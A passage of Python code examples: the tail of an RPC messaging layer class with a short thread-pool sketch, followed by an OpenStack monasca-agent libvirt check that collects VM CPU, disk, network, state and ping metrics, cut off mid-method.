        self.route(routing_key, JsonRPCNotify(method=routing_key,
                                              args=(msg, )), **params)
        return ret

    def callSync(self, timeout, rpc_name, *args, **kwargs):
        @sync(timeout=timeout)
        def wrap():
            return self.call(rpc_name, *args, **kwargs)

        return wrap()

    def notify(self, method, *args, **kwargs):
        self.publish(method,
                     JsonRPCNotify(method=method, args=args, kwargs=kwargs))

    def deregister(self, routing_key, **params):
        params["method"] = "anycast"
        super(RpcLayer, self).unsubscribe(routing_key, **params)

    def unsubscribe(self, routing_key, **params):
        super(RpcLayer, self).unsubscribe(routing_key, **params)

    def subscribe(self, routing_key, function_pointer, frame=False, **params):

        self.logger.debug("Subscribing to %s with params: %s" %
                          (routing_key, params))

        if function_pointer is None:
            function_pointer = self.receive
        else:
            if not frame:
                function_pointer = self._make_handler(function_pointer)
            function_pointer = self.apply_in_pool(function_pointer)

        super(RpcLayer, self).subscribe(routing_key,
                                        function_pointer=function_pointer,
                                        **params)

    def register_direct(self, routing_key, msg_handler):
        pass

    def register(self, routing_key, function_pointer=None, **params):

        if function_pointer is None:
            function_pointer = self.receive
        else:
            function_pointer = self._make_handler(function_pointer)
            function_pointer = self.apply_in_pool(function_pointer)

        params = params or dict()
        params["method"] = "anycast"
        self._top_layer.subscribe(routing_key,
                                  function_pointer=function_pointer,
                                  **params)

    def receive(self, *args, **kwargs):
        self._pool.apply_async(func=self._receive, args=args, kwds=kwargs)

    def apply_in_pool(self, function):
        def apply_f(*args, **kwargs):
            self._pool.apply_async(func=function, args=args, kwds=kwargs)

        apply_f.func_name = function.func_name
        return apply_f

    def _make_handler(self, function):
        """

        This method creates a wrapper for the given "function".

        This serves two purposes:

        A) Send the result back to the caller.

        B) Create an environment for asynchronous RPC within function.

        :param function:
        :param reply_to:
        :param corr_id:
        :return:
        """

        # ----------------- INTERNAL FUNCTION ------------------------------------------------------------

        @inlineCallbacks
        def on_call(routing_key, message, sender=None, **params):

            assert self.logger

            if isinstance(message, JsonRPCCall):
                try:
                    self.logger.info(
                        "-------------------CALL TO COMPONENT-----------------------"
                    )
                    self.logger.info(
                        "Executing function '%s' with argument(s) %s and %s",
                        function.func_name, message.get_args,
                        message.get_kwargs)
                    res = yield function(*message.get_args,
                                         **message.get_kwargs)
                    # self._out_channel.basic_ack(delivery_tag=delivery_tag)
                    self.send_result(result=res,
                                     receiver=sender,
                                     id=message.get_id)
                except BaseException as e:
                    self.logger.info(
                        "----------------CALL TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception(
                        "Message: \n %s \n caused an Error: \n %s" %
                        (message, e))
                    self.send_error(code=1,
                                    message=e.message,
                                    receiver=sender,
                                    id=message.get_id,
                                    args=e.args)
                except:
                    self.logger.info(
                        "-----------------CALL TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception("Message: \n %s \n caused an Error" %
                                          (message))
                    self.send_error(code=1, receiver=sender, id=message.get_id)

            if isinstance(message, JsonRPCNotify):
                try:
                    self.logger.info(
                        "--------------DELIVER EVENT TO COMPONENT---------------------------"
                    )
                    self.logger.info(
                        "Executing function '%s' with argument(s) %s and %s",
                        function.func_name, message.get_args,
                        message.get_kwargs)
                    function(*message.get_args, **message.get_kwargs)
                except BaseException as e:
                    self.logger.info(
                        "--------------DELIVER EVENT TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception(
                        "Message: \n %s \n caused an Error: \n %s" %
                        (message, e))

        # ----------------- INTERNAL FUNCTION ------------------------------------------------------------

        return on_call

    def _receive(self, routing_key, message, sender=None, **params):

        if isinstance(message, JsonRPCResult):
            self.logger.info(
                "----------------RECEIVED A RESULT---------------------")
            self.logger.info("Result received: \n %s" % (message))
            corr_id = message.get_id
            deferred = self._pending.get(corr_id, None)
            if deferred:
                deferred.callback(message.get_result)
                del self._pending[corr_id]

        if isinstance(message, JsonRPCError):
            self.logger.info(
                "----------------RECEIVED AN ERROR---------------------")
            self.logger.exception("Error received: \n %s" % (message))
            corr_id = message.get_id
            deferred = self._pending.get(corr_id, None)
            if deferred:
                deferred.errback(message)
                del self._pending[corr_id]

        if self.msg_handler:
            self.msg_handler(routing_key, message, sender, **params)
        pass

    def get_transport_layer(self):
        return super(RpcLayer, self).get_transport_layer()

    def set_msg_handler(self, msg_handler):
        self.msg_handler = msg_handler
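
RpcLayer.apply_in_pool above wraps a handler so that every invocation is handed to the pool via apply_async instead of running on the caller's thread. Here is a stand-alone sketch of that wrapper using only the standard library; handle_message() is a placeholder, not the RpcLayer dispatch logic.

# Minimal sketch of the apply_in_pool idea: calling the wrapped handler only
# schedules the real work on the pool and returns immediately.
from multiprocessing.dummy import Pool as ThreadPool
import functools


def apply_in_pool(pool, function):
    @functools.wraps(function)
    def apply_f(*args, **kwargs):
        pool.apply_async(func=function, args=args, kwds=kwargs)
    return apply_f


def handle_message(routing_key, message):
    print("handling", routing_key, message)


if __name__ == '__main__':
    pool = ThreadPool(2)
    async_handler = apply_in_pool(pool, handle_message)
    async_handler("some.routing.key", {"id": 1})   # does not block the caller
    pool.close()
    pool.join()                                    # wait for the scheduled handler
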
Example #46
0
class LibvirtCheck(AgentCheck):
    """Inherit Agent class and gather libvirt metrics"""
    def __init__(self, name, init_config, agent_config, instances=None):
        AgentCheck.__init__(self,
                            name,
                            init_config,
                            agent_config,
                            instances=[{}])
        self.instance_cache_file = "{0}/{1}".format(
            self.init_config.get('cache_dir'), 'libvirt_instances.json')
        self.metric_cache_file = "{0}/{1}".format(
            self.init_config.get('cache_dir'), 'libvirt_metrics.json')
        self.use_bits = self.init_config.get('network_use_bits')

        self._collect_intervals = {}
        self._host_aggregate = None

        self._set_collection_intervals('disk', 'disk_collection_period')
        self._set_collection_intervals('vnic', 'vnic_collection_period')

        pool_size = self.init_config.get('max_ping_concurrency', 8)
        self.pool = Pool(pool_size)

    def _set_collection_intervals(self, interval_name, config_name):
        self._collect_intervals[interval_name] = {
            'period': int(self.init_config.get(config_name, 0)),
            'last_collect': datetime.fromordinal(1),
            'skip': False
        }

    def _test_vm_probation(self, created):
        """Test to see if a VM was created within the probation period.

        Convert an ISO-8601 timestamp into UNIX epoch timestamp from now
        and compare that against configured vm_probation.  Return the
        number of seconds this VM will remain in probation.
        """
        dt = datetime.strptime(created, '%Y-%m-%dT%H:%M:%SZ')
        created_sec = (time.time() - timegm(dt.timetuple()))
        probation_time = self.init_config.get('vm_probation',
                                              300) - created_sec
        return int(probation_time)

    def _get_metric_name(self, orig_name):
        # Rename "tx" to "out" and "rx" to "in"
        metric_name = orig_name.replace("tx", "out").replace("rx", "in")
        if self.use_bits:
            metric_name = metric_name.replace("bytes", "bits")
        return metric_name

    @staticmethod
    def _get_metric_rate_name(metric_name):
        """Change the metric name to a rate, i.e. "net.rx_bytes"
        gets converted to "net.rx_bytes_sec"
        """
        return "{0}_sec".format(metric_name)

    @staticmethod
    def _validate_secgroup(cache, instance, source_ip):
        """Search through an instance's security groups for pingability
        """
        for instance_secgroup in instance.security_groups:
            for secgroup in cache:
                if ((secgroup['tenant_id'] == instance.tenant_id
                     and secgroup['name'] == instance_secgroup['name'])):
                    for rule in secgroup['security_group_rules']:
                        if rule['protocol'] == 'icmp':
                            if ((not rule['remote_ip_prefix']
                                 or all_matching_cidrs(
                                     source_ip, [rule['remote_ip_prefix']]))):
                                return True

    def _update_instance_cache(self):
        """Collect instance_id, project_id, and AZ for all instance UUIDs
        """

        id_cache = {}
        flavor_cache = {}
        port_cache = None
        netns = None
        # Get a list of all instances from the Nova API
        session = keystone.get_session(**self.init_config)
        nova_client = n_client.Client(
            "2.1",
            session=session,
            endpoint_type=self.init_config.get("endpoint_type", "publicURL"),
            service_type="compute",
            region_name=self.init_config.get('region_name'),
            client_name='monasca-agent[libvirt]',
            client_version=ma_version.version_string)
        self._get_this_host_aggregate(nova_client)
        instances = nova_client.servers.list(search_opts={
            'all_tenants': 1,
            'host': self.hostname
        })
        # Lay the groundwork for fetching VM IPs and network namespaces
        if self.init_config.get('ping_check'):
            nu = neutron_client.Client(
                session=session,
                endpoint_type=self.init_config.get("endpoint_type",
                                                   "publicURL"),
                region_name=self.init_config.get('region_name'),
                client_name='monasca-agent[libvirt]',
                client_version=ma_version.version_string)
            port_cache = nu.list_ports()['ports']
            # Finding existing network namespaces is an indication that either
            # DVR agent_mode is enabled, or this is all-in-one (like devstack)
            netns = subprocess.check_output(['ip', 'netns', 'list'])
            if netns == '':
                self.log.warn(
                    "Unable to ping VMs, no network namespaces found." +
                    "Either no VMs are present, or routing is centralized.")

        #
        # Only make the keystone call to get the tenant list
        # if we are configured to publish tenant names.
        #
        tenants = []
        if self.init_config.get(
                'metadata') and 'tenant_name' in self.init_config.get(
                    'metadata'):
            tenants = utils.get_tenant_list(self.init_config, self.log)

        for instance in instances:
            instance_ports = []
            inst_name = instance.__getattr__('OS-EXT-SRV-ATTR:instance_name')
            inst_az = instance.__getattr__('OS-EXT-AZ:availability_zone')
            if instance.flavor['id'] in flavor_cache:
                inst_flavor = flavor_cache[instance.flavor['id']]
            else:
                try:
                    inst_flavor = nova_client.flavors.get(
                        instance.flavor['id'])
                except NotFound as e:
                    self.log.error('Skipping VM {}: {}'.format(inst_name, e))
                    continue
                flavor_cache[instance.flavor['id']] = inst_flavor
            if port_cache:
                instance_ports = [
                    p['id'] for p in port_cache
                    if p['device_id'] == instance.id
                ]
            id_cache[inst_name] = {
                'instance_uuid': instance.id,
                'hostname': instance.name,
                'zone': inst_az,
                'created': instance.created,
                'tenant_id': instance.tenant_id,
                'vcpus': inst_flavor.vcpus,
                'ram': inst_flavor.ram,
                'disk': inst_flavor.disk,
                'instance_ports': instance_ports
            }

            tenant_name = utils.get_tenant_name(tenants, instance.tenant_id)
            if tenant_name:
                id_cache[inst_name]['tenant_name'] = tenant_name

            for config_var in ['metadata', 'customer_metadata']:
                if self.init_config.get(config_var):
                    for metadata in self.init_config.get(config_var):
                        if instance.metadata.get(metadata):
                            id_cache[inst_name][metadata] = (
                                instance.metadata.get(metadata))

            # Build a list of pingable IP addresses attached to this VM and the
            # appropriate namespace, for use in ping tests
            if netns:
                secgroup_cache = nu.list_security_groups()['security_groups']
                self._build_ip_list(instance, inst_name, secgroup_cache,
                                    port_cache, id_cache)

        id_cache['last_update'] = int(time.time())

        # Write the updated cache
        try:
            with open(self.instance_cache_file, 'w') as cache_json:
                json.dump(id_cache, cache_json)
            if stat.S_IMODE(os.stat(
                    self.instance_cache_file).st_mode) != 0o600:
                os.chmod(self.instance_cache_file, 0o600)
        except IOError as e:
            self.log.error("Cannot write to {0}: {1}".format(
                self.instance_cache_file, e))

        return id_cache

    def _build_ip_list(self, instance, inst_name, secgroup_cache, port_cache,
                       id_cache):
        # Find all active fixed IPs for this VM, fetch each subnet_id
        for net in instance.addresses:
            for ip in instance.addresses[net]:
                if ip['OS-EXT-IPS:type'] == 'fixed' and ip['version'] == 4:
                    subnet_id = None
                    nsuuid = None
                    for port in port_cache:
                        if ((port['mac_address']
                             == ip['OS-EXT-IPS-MAC:mac_addr']
                             and port['tenant_id'] == instance.tenant_id
                             and port['status'] == 'ACTIVE')):
                            for fixed in port['fixed_ips']:
                                if fixed['ip_address'] == ip['addr']:
                                    subnet_id = fixed['subnet_id']
                                    break
                    # Use the subnet_id to find the router
                    ping_allowed = False
                    if subnet_id is not None:
                        for port in port_cache:
                            if ((port['device_owner'].startswith(
                                    'network:router_interface')
                                 and port['tenant_id'] == instance.tenant_id
                                 and port['status'] == 'ACTIVE')):
                                nsuuid = port['device_id']
                                for fixed in port['fixed_ips']:
                                    if fixed['subnet_id'] == subnet_id:
                                        # Validate security group
                                        if self._validate_secgroup(
                                                secgroup_cache, instance,
                                                fixed['ip_address']):
                                            ping_allowed = True
                                            break
                            if nsuuid is not None:
                                break
                    if nsuuid is not None and ping_allowed:
                        if 'network' not in id_cache[inst_name]:
                            id_cache[inst_name]['network'] = []
                        id_cache[inst_name]['network'].append({
                            'namespace':
                            "qrouter-{0}".format(nsuuid),
                            'ip':
                            ip['addr']
                        })
                    elif ping_allowed is False:
                        self.log.debug("ICMP disallowed for {0} on {1}".format(
                            inst_name, ip['addr']))

    def _load_instance_cache(self):
        """Load the cache map of instance names to Nova data.
           If the cache does not yet exist or is damaged, (re-)build it.
        """
        instance_cache = {}
        try:
            with open(self.instance_cache_file, 'r') as cache_json:
                instance_cache = json.load(cache_json)

                # Is it time to force a refresh of this data?
                if self.init_config.get('nova_refresh') is not None:
                    time_diff = time.time() - instance_cache['last_update']
                    if time_diff > self.init_config.get('nova_refresh'):
                        self._update_instance_cache()
        except (IOError, TypeError, ValueError):
            # The file may not exist yet, or is corrupt.  Rebuild it now.
            self.log.warning("Instance cache missing or corrupt, rebuilding.")
            instance_cache = self._update_instance_cache()
            pass

        return instance_cache

    def _load_metric_cache(self):
        """Load the counter metrics from the previous collection iteration
        """
        metric_cache = {}
        try:
            with open(self.metric_cache_file, 'r') as cache_json:
                metric_cache = json.load(cache_json)
        except (IOError, TypeError, ValueError):
            # The file may not exist yet.
            self.log.warning("Metrics cache missing or corrupt, rebuilding.")
            metric_cache = {}
            pass

        return metric_cache

    def _update_metric_cache(self, metric_cache, run_time):
        # Remove inactive VMs from the metric cache
        write_metric_cache = deepcopy(metric_cache)
        for instance in metric_cache:
            if (('cpu.time' not in metric_cache[instance]
                 or self._test_vm_probation(
                     time.strftime(
                         '%Y-%m-%dT%H:%M:%SZ',
                         time.gmtime(metric_cache[instance]['cpu.time']
                                     ['timestamp'] + run_time))) < 0)):
                self.log.info(
                    "Expiring old/empty {0} from cache".format(instance))
                del (write_metric_cache[instance])
        try:
            with open(self.metric_cache_file, 'w') as cache_json:
                json.dump(write_metric_cache, cache_json)
            if stat.S_IMODE(os.stat(self.metric_cache_file).st_mode) != 0o600:
                os.chmod(self.metric_cache_file, 0o600)
        except IOError as e:
            self.log.error("Cannot write to {0}: {1}".format(
                self.metric_cache_file, e))

    def _inspect_network(self, insp, inst, inst_name, instance_cache,
                         metric_cache, dims_customer, dims_operations):
        """Inspect network metrics for an instance"""
        for vnic in insp.inspect_vnics(inst):
            sample_time = time.time()
            vnic_dimensions = {'device': vnic[0].name}
            instance_ports = instance_cache.get(inst_name)['instance_ports']
            partial_port_id = vnic[0].name.split('tap')[1]
            # Multiple networked guest
            for port in instance_ports:
                if partial_port_id == port[:11]:
                    vnic_dimensions['port_id'] = port
                    break
            for metric in vnic[1]._fields:
                metric_name = "net.{0}".format(metric)
                if metric_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][metric_name] = {}

                value = int(vnic[1].__getattribute__(metric))
                if vnic[0].name in metric_cache[inst_name][metric_name]:
                    last_update_time = metric_cache[inst_name][metric_name][
                        vnic[0].name]['timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(
                        value, metric_cache[inst_name][metric_name][
                            vnic[0].name]['value'], time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative network sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, value, metric_cache[inst_name]
                                [metric_name][vnic[0].name]['value']))
                        metric_cache[inst_name][metric_name][vnic[0].name] = {
                            'timestamp': sample_time,
                            'value': value
                        }
                        continue
                    rate_name = self._get_metric_rate_name(metric_name)
                    rate_name = self._get_metric_name(rate_name)
                    if self.use_bits:
                        rate_value *= 8
                    # Customer
                    this_dimensions = vnic_dimensions.copy()
                    this_dimensions.update(dims_customer)
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    # Operations (metric name prefixed with "vm.")
                    this_dimensions = vnic_dimensions.copy()
                    this_dimensions.update(dims_operations)
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=this_dimensions)
                # Report raw counters.
                mapped_name = self._get_metric_name(metric_name)
                weighted_value = value
                if self.use_bits:
                    weighted_value = value * 8
                # Customer
                this_dimensions = vnic_dimensions.copy()
                this_dimensions.update(dims_customer)
                self.gauge(mapped_name,
                           weighted_value,
                           dimensions=this_dimensions,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                # Operations (metric name prefixed with "vm.")
                this_dimensions = vnic_dimensions.copy()
                this_dimensions.update(dims_operations)
                self.gauge("vm.{0}".format(mapped_name),
                           weighted_value,
                           dimensions=this_dimensions)
                # Save this metric to the cache
                metric_cache[inst_name][metric_name][vnic[0].name] = {
                    'timestamp': sample_time,
                    'value': value
                }

    def _inspect_cpu(self, insp, inst, inst_name, instance_cache, metric_cache,
                     dims_customer, dims_operations):
        """Inspect cpu metrics for an instance"""

        sample_time = float("{:9f}".format(time.time()))
        cpu_info = insp.inspect_cpus(inst)

        if 'cpu.time' in metric_cache[inst_name]:
            # I have a prior value, so calculate the raw_perc & push the metric
            cpu_diff = cpu_info.time - metric_cache[inst_name]['cpu.time'][
                'value']
            time_diff = sample_time - float(
                metric_cache[inst_name]['cpu.time']['timestamp'])
            # Convert time_diff to nanoseconds, and calculate percentage
            raw_perc = (cpu_diff / (time_diff * 1000000000)) * 100
            # Divide by the number of cores to normalize the percentage
            normalized_perc = (raw_perc / cpu_info.number)
            if raw_perc < 0:
                # Bad value, save current reading and skip
                self.log.warn(
                    "Ignoring negative CPU sample for: "
                    "{0} new cpu time: {1} old cpu time: {2}".format(
                        inst_name, cpu_info.time,
                        metric_cache[inst_name]['cpu.time']['value']))
                metric_cache[inst_name]['cpu.time'] = {
                    'timestamp': sample_time,
                    'value': cpu_info.time
                }
                return

            self.gauge(
                'cpu.utilization_perc',
                int(round(raw_perc, 0)),
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge(
                'cpu.utilization_norm_perc',
                int(round(normalized_perc, 0)),
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge('vm.cpu.utilization_perc',
                       int(round(raw_perc, 0)),
                       dimensions=dims_operations)
            self.gauge('vm.cpu.utilization_norm_perc',
                       int(round(normalized_perc, 0)),
                       dimensions=dims_operations)

            cpu_time_name = 'cpu.time_ns'
            # cpu.time_ns for owning tenant
            self.gauge(
                cpu_time_name,
                cpu_info.time,
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            # vm.cpu.time_ns for operations tenant
            self.gauge("vm.{0}".format(cpu_time_name),
                       cpu_info.time,
                       dimensions=dims_operations)
        metric_cache[inst_name]['cpu.time'] = {
            'timestamp': sample_time,
            'value': cpu_info.time
        }

    def _inspect_disks(self, insp, inst, inst_name, instance_cache,
                       metric_cache, dims_customer, dims_operations):
        """Inspect disk metrics for an instance"""

        metric_aggregate = {}
        for disk in insp.inspect_disks(inst):
            sample_time = time.time()
            disk_dimensions = {'device': disk[0].device}
            for metric in disk[1]._fields:
                metric_name = "io.{0}".format(metric.replace(
                    'requests', 'ops'))
                if metric_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][metric_name] = {}

                value = int(disk[1].__getattribute__(metric))
                metric_aggregate[metric_name] = metric_aggregate.get(
                    metric_name, 0) + value
                if disk[0].device in metric_cache[inst_name][metric_name]:
                    cached_val = metric_cache[inst_name][metric_name][
                        disk[0].device]['value']
                    last_update_time = metric_cache[inst_name][metric_name][
                        disk[0].device]['timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(value, cached_val,
                                                      time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative disk sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, value, cached_val))
                        metric_cache[inst_name][metric_name][
                            disk[0].device] = {
                                'timestamp': sample_time,
                                'value': value
                            }
                        continue
                    # Change the metric name to a rate, ie. "io.read_requests"
                    # gets converted to "io.read_ops_sec"
                    rate_name = "{0}_sec".format(
                        metric_name.replace('requests', 'ops'))
                    # Customer
                    this_dimensions = disk_dimensions.copy()
                    this_dimensions.update(dims_customer)
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge(
                        metric_name,
                        value,
                        dimensions=this_dimensions,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])

                    # Operations (metric name prefixed with "vm.")
                    this_dimensions = disk_dimensions.copy()
                    this_dimensions.update(dims_operations)
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=this_dimensions)
                    self.gauge("vm.{0}".format(metric_name),
                               value,
                               dimensions=this_dimensions)
                # Save this metric to the cache
                metric_cache[inst_name][metric_name][disk[0].device] = {
                    'timestamp': sample_time,
                    'value': value
                }

        if self.init_config.get('vm_extended_disks_check_enable'):
            for metric in metric_aggregate:
                sample_time = time.time()
                rate_name = "{0}_total_sec".format(metric)
                if rate_name not in metric_cache[inst_name]:
                    metric_cache[inst_name][rate_name] = {}
                else:
                    last_update_time = metric_cache[inst_name][rate_name][
                        'timestamp']
                    time_diff = sample_time - float(last_update_time)
                    rate_value = self._calculate_rate(
                        metric_aggregate[metric],
                        metric_cache[inst_name][rate_name]['value'], time_diff)
                    if rate_value < 0:
                        # Bad value, save current reading and skip
                        self.log.warn(
                            "Ignoring negative disk sample for: "
                            "{0} new value: {1} old value: {2}".format(
                                inst_name, metric_aggregate[metric],
                                metric_cache[inst_name][rate_name]['value']))
                        metric_cache[inst_name][rate_name] = {
                            'timestamp': sample_time,
                            'value': metric_aggregate[metric]
                        }
                        continue
                    self.gauge(
                        rate_name,
                        rate_value,
                        dimensions=dims_customer,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge("vm.{0}".format(rate_name),
                               rate_value,
                               dimensions=dims_operations)
                self.gauge("{0}_total".format(metric),
                           metric_aggregate[metric],
                           dimensions=dims_customer,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                self.gauge("vm.{0}_total".format(metric),
                           metric_aggregate[metric],
                           dimensions=dims_operations)
                # Save this metric to the cache
                metric_cache[inst_name][rate_name] = {
                    'timestamp': sample_time,
                    'value': metric_aggregate[metric]
                }

    def _inspect_disk_info(self, insp, inst, inst_name, instance_cache,
                           metric_cache, dims_customer, dims_operations):
        """Inspect disk metrics for an instance"""

        metric_aggregate = {}
        for disk in insp.inspect_disk_info(inst):
            disk_dimensions = {'device': disk[0].device}
            for metric in disk[1]._fields:
                metric_name = "disk.{0}".format(metric)
                value = int(disk[1].__getattribute__(metric))
                metric_aggregate[metric_name] = metric_aggregate.get(
                    metric_name, 0) + value
                this_dimensions = disk_dimensions.copy()
                this_dimensions.update(dims_customer)
                self.gauge(metric_name,
                           value,
                           dimensions=this_dimensions,
                           delegated_tenant=instance_cache.get(inst_name)
                           ['tenant_id'],
                           hostname=instance_cache.get(inst_name)['hostname'])
                # Operations (metric name prefixed with "vm.")
                this_dimensions = disk_dimensions.copy()
                this_dimensions.update(dims_operations)
                self.gauge("vm.{0}".format(metric_name),
                           value,
                           dimensions=this_dimensions)

        for metric in metric_aggregate:
            self.gauge(
                "{0}_total".format(metric),
                metric_aggregate[metric],
                dimensions=dims_customer,
                delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                hostname=instance_cache.get(inst_name)['hostname'])
            self.gauge("vm.{0}_total".format(metric),
                       metric_aggregate[metric],
                       dimensions=dims_operations)

    def _inspect_state(self, insp, inst, inst_name, instance_cache,
                       dims_customer, dims_operations):
        """Look at the state of the instance, publish a metric using a
           user-friendly description in the 'detail' metadata, and return
           a status code (calibrated to UNIX status codes where 0 is OK)
           so that remaining metrics can be skipped if the VM is not OK
        """
        inst_state = inst.state()
        dom_status = inst_state[0] - 1
        metatag = None

        if inst_state[0] in DOM_STATES:
            metatag = {'detail': DOM_STATES[inst_state[0]]}
        # A VM being in SHUTOFF state may have many reasons, we try to be more specific here
        if inst_state[0] == libvirt.VIR_DOMAIN_SHUTOFF:
            if inst_state[1] in DOM_SHUTOFF_STATES:
                metatag = {'detail': DOM_SHUTOFF_STATES[inst_state[1]]}

        self.gauge('host_alive_status',
                   dom_status,
                   dimensions=dims_customer,
                   delegated_tenant=instance_cache.get(inst_name)['tenant_id'],
                   hostname=instance_cache.get(inst_name)['hostname'],
                   value_meta=metatag)
        self.gauge('vm.host_alive_status',
                   dom_status,
                   dimensions=dims_operations,
                   value_meta=metatag)

        return dom_status

    def prepare_run(self):
        """Check if it is time for measurements to be collected"""
        for name, collection in self._collect_intervals.items():
            if collection['period'] <= 0:
                continue

            time_since_last = datetime.now() - collection['last_collect']
            # Handle times that are really close to the collection period
            period_with_fudge_factor = timedelta(0, collection['period'] - 1,
                                                 500000)

            if time_since_last < period_with_fudge_factor:
                self.log.debug('Skipping {} collection for {} seconds'.format(
                    name, (collection['period'] - time_since_last.seconds)))
                collection['skip'] = True
            else:
                collection['skip'] = False
                collection['last_collect'] = datetime.now()

    def _run_ping(self, dims_customer, dims_operations, inst_name,
                  instance_cache, net):
        """Create a ping command and hand it off to the Thread Pool"""
        ping_cmd = self.init_config.get('ping_check').replace(
            'NAMESPACE', net['namespace']).split()
        ping_cmd.append(net['ip'])
        dims_customer_ip = dims_customer.copy()
        dims_operations_ip = dims_operations.copy()
        dims_customer_ip['ip'] = net['ip']
        dims_operations_ip['ip'] = net['ip']
        with open(os.devnull, "w") as fnull:
            try:
                self.log.debug("Running ping test: {0}".format(
                    ' '.join(ping_cmd)))
                res = subprocess.call(ping_cmd, stdout=fnull, stderr=fnull)
                tenant_id = instance_cache.get(inst_name)['tenant_id']
                hostname = instance_cache.get(inst_name)['hostname']
                return (res, dims_customer_ip, dims_operations_ip, tenant_id,
                        hostname)

            except Exception as e:
                self.log.exception(
                    "OS error running '{0}' failed".format(ping_cmd), e)
                raise e

    def _check_ping_results(self, ping_results):
        """Iterate through ping results and create measurements"""
        for result in ping_results:
            result.wait()
            # If it wasn't successful, a message was already logged in _run_ping
            if result.successful():
                (res, dims_customer_ip, dims_operations_ip, delegated_tenant,
                 hostname) = result.get()
                self.gauge('ping_status',
                           res,
                           dimensions=dims_customer_ip,
                           delegated_tenant=delegated_tenant,
                           hostname=hostname)
                self.gauge('vm.ping_status',
                           res,
                           dimensions=dims_operations_ip)

    def check(self, instance):
        """Gather VM metrics for each instance"""

        time_start = time.time()

        # Load metric cache
        metric_cache = self._load_metric_cache()

        # Load the nova-obtained instance data cache
        instance_cache = self._load_instance_cache()

        # Build dimensions for both the customer and for operations
        dims_base = self._set_dimensions(
            {
                'service': 'compute',
                'component': 'vm'
            }, instance)

        # Define aggregate gauges, gauge name to metric name
        agg_gauges = {
            'vcpus': 'nova.vm.cpu.total_allocated',
            'ram': 'nova.vm.mem.total_allocated_mb',
            'disk': 'nova.vm.disk.total_allocated_gb'
        }
        agg_values = {}
        for gauge in agg_gauges.keys():
            agg_values[gauge] = 0

        insp = inspector.get_hypervisor_inspector()
        updated_cache_this_time = False
        ping_results = []
        for inst in insp._get_connection().listAllDomains():
            # Verify that this instance exists in the cache.  Add if necessary.
            inst_name = inst.name()
            if inst_name not in instance_cache and not updated_cache_this_time:
                #
                # If we have multiple ghost VMs, we'll needlessly
                # update the instance cache.  Let's limit the cache
                # update to once per agent wakeup.
                #
                updated_cache_this_time = True
                instance_cache = self._update_instance_cache()

            # Build customer dimensions
            try:
                dims_customer = dims_base.copy()
                dims_customer['resource_id'] = instance_cache.get(
                    inst_name)['instance_uuid']
                dims_customer['zone'] = instance_cache.get(inst_name)['zone']
                # Add dimensions that would be helpful for operations
                dims_operations = dims_customer.copy()
                dims_operations['tenant_id'] = instance_cache.get(
                    inst_name)['tenant_id']
                dims_operations = self._update_dims_with_metadata(
                    instance_cache, inst_name, dims_operations)
                if self.init_config.get('customer_metadata'):
                    for metadata in self.init_config.get('customer_metadata'):
                        metadata_value = (
                            instance_cache.get(inst_name).get(metadata))
                        if metadata_value:
                            dims_customer[metadata] = metadata_value
                # Remove customer 'hostname' dimension, this will be replaced by the VM name
                del (dims_customer['hostname'])
                #
                # Add this hypervisor's host aggregate as a dimension if
                # configured to do so and we had a match on the regex for
                # this host.
                #
                if self._host_aggregate:
                    dims_operations['host_aggregate'] = self._host_aggregate
            except TypeError:
                # Nova can potentially get into a state where it can't see an
                # instance, but libvirt can.  This would cause TypeErrors as
                # incomplete data is cached for this instance.  Log and skip.
                self.log.error(
                    "{0} is not known to nova after instance cache update -- skipping this ghost VM."
                    .format(inst_name))
                continue

            # Accumulate aggregate data
            for gauge in agg_gauges:
                if gauge in instance_cache.get(inst_name):
                    agg_values[gauge] += instance_cache.get(inst_name)[gauge]

            # Skip instances created within the probation period
            vm_probation_remaining = self._test_vm_probation(
                instance_cache.get(inst_name)['created'])
            if (vm_probation_remaining >= 0):
                self.log.info(
                    "Libvirt: {0} in probation for another {1} seconds".format(
                        instance_cache.get(inst_name)['hostname'].encode(
                            'utf8'), vm_probation_remaining))
                continue

            # Skip further processing on VMs that are not in an active state
            if self._inspect_state(insp, inst, inst_name, instance_cache,
                                   dims_customer, dims_operations) != 0:
                continue

            # Skip the remainder of the checks if alive_only is True in the config
            if self.init_config.get('alive_only'):
                continue

            if inst_name not in metric_cache:
                metric_cache[inst_name] = {}

            if self.init_config.get('vm_cpu_check_enable'):
